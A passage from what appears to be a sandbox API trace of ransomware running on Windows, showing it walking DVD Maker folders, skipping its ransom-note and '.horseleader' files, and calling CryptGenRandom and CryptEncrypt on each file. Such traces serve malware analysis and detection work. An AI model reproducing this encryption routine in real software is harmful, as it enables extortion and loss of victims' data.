dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.406] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="4to3Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.406] lstrcmpiW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.406] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned 87 [0251.406] StrStrIW (lpFirst="4to3Squareframe_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.406] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.406] lstrcmpW (lpString1="4to3Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.406] lstrlenW (lpString=".testttjffg") returned 11 [0251.407] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.407] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.407] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.407] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec8a80b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec8a80b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="4to3Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0251.407] lstrcmpiW (lpString1="4to3Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0251.407] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned 78 [0251.407] StrStrIW (lpFirst="4to3Squareframe_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.407] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.407] lstrcmpW (lpString1="4to3Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.407] lstrlenW (lpString=".testttjffg") returned 11 [0251.407] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.407] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.407] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.408] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.408] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BabyBoy", cAlternateFileName="")) returned 1 [0251.408] lstrcmpiW (lpString1="BabyBoy", lpString2="Windows") returned -1 [0251.408] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 55 [0251.408] lstrcmpW (lpString1="BabyBoy", lpString2=".") returned 1 [0251.408] lstrcmpW (lpString1="BabyBoy", lpString2="..") returned 1 [0251.408] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.408] GetProcessHeap () returned 0x780000 [0251.408] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.408] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*") returned 57 [0251.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.411] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.411] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\.") returned 57 [0251.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.411] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\..") returned 58 [0251.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.412] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cace83, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70cace83, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x303d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="babyblue.png", cAlternateFileName="")) returned 1 [0251.412] lstrcmpiW (lpString1="babyblue.png", lpString2="Windows") returned -1 [0251.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png") returned 68 [0251.412] StrStrIW (lpFirst="babyblue.png", lpSrch=".horseleader") returned 0x0 [0251.412] lstrcmpW (lpString1="babyblue.png", lpString2="#Decrypt#.txt") returned 1 [0251.412] lstrcmpW (lpString1="babyblue.png", lpString2="_uninstalling_.png") returned 1 [0251.412] lstrlenW (lpString=".testttjffg") returned 11 [0251.412] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png", lpSrch=".testttjffg") returned 0x0 [0251.412] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.412] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\babyblue.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyblue.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.413] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d1f29a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d1f29a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5354a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainBackground.wmv", cAlternateFileName="")) returned 1 [0251.413] lstrcmpiW (lpString1="BabyBoyMainBackground.wmv", lpString2="Windows") returned -1 [0251.413] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv") returned 81 [0251.413] StrStrIW (lpFirst="BabyBoyMainBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.413] lstrcmpW (lpString1="BabyBoyMainBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.413] lstrcmpW (lpString1="BabyBoyMainBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.413] lstrlenW (lpString=".testttjffg") returned 11 [0251.413] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.413] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.414] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d6b554, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d6b554, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f6ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.414] lstrcmpiW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.414] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned 85 [0251.414] StrStrIW (lpFirst="BabyBoyMainBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.414] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.414] lstrcmpW (lpString1="BabyBoyMainBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.414] lstrlenW (lpString=".testttjffg") returned 11 [0251.414] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.415] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.415] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e03ac8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e03ac8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49d12255, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.415] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="Windows") returned -1 [0251.415] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned 88 [0251.415] StrStrIW (lpFirst="BabyBoyMainToNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.415] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.415] lstrcmpW (lpString1="BabyBoyMainToNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.415] lstrlenW (lpString=".testttjffg") returned 11 [0251.415] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.415] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.415] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.415] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e29c25, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e29c25, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2661e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.415] lstrcmpiW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.416] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv") returned 92 [0251.416] StrStrIW (lpFirst="BabyBoyMainToNotesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.416] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.416] lstrcmpW (lpString1="BabyBoyMainToNotesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.416] lstrlenW (lpString=".testttjffg") returned 11 [0251.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.416] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c9de, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0251.416] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="Windows") returned -1 [0251.416] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv") returned 89 [0251.416] StrStrIW (lpFirst="BabyBoyMainToScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.416] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.416] lstrcmpW (lpString1="BabyBoyMainToScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.416] lstrlenW (lpString=".testttjffg") returned 11 [0251.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.416] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e4fd82, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e4fd82, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49eb515f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyMainToScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.418] lstrcmpiW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv") returned 93 [0251.418] StrStrIW (lpFirst="BabyBoyMainToScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.418] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.418] lstrcmpW (lpString1="BabyBoyMainToScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.418] lstrlenW (lpString=".testttjffg") returned 11 [0251.418] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.418] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.418] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.418] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintoscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70ec2199, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70ec2199, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49edb2bd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2666c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="BabyBoyNotesBackground.wmv", cAlternateFileName="")) returned 1 [0251.418] lstrcmpiW (lpString1="BabyBoyNotesBackground.wmv", lpString2="Windows") returned -1 [0251.418] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv") returned 82 [0251.418] StrStrIW (lpFirst="BabyBoyNotesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.418] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.418] lstrcmpW (lpString1="BabyBoyNotesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.418] lstrlenW (lpString=".testttjffg") returned 11 [0251.418] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboynotesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.419] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70f345b0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70f345b0, 